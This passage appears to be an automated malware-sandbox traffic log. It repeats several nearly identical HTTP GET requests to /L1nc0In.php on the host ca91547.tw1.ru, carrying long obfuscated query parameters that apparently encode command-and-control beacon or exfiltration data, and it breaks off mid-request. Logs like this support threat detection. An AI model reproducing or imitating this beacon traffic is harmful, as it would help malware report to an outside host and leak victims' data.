(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWSwUERNdHND50MwMET6FEVONDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplFVNNTTq1EeJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiUGMmlDNlJTO2U2MiNzYykTNiRDZ5QWM1YmN3MGZyIDMiwiIjVWNmBjZlVGMxETO1gDM3cTY3UGN5MTMhFDO2IDMxEjYiNDNjVWZ3IiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W HTTP/1.1Accept: /Content-Type: text/plainUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: ca91547.tw1.ru
Source: global traffic	HTTP traffic detected: GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2V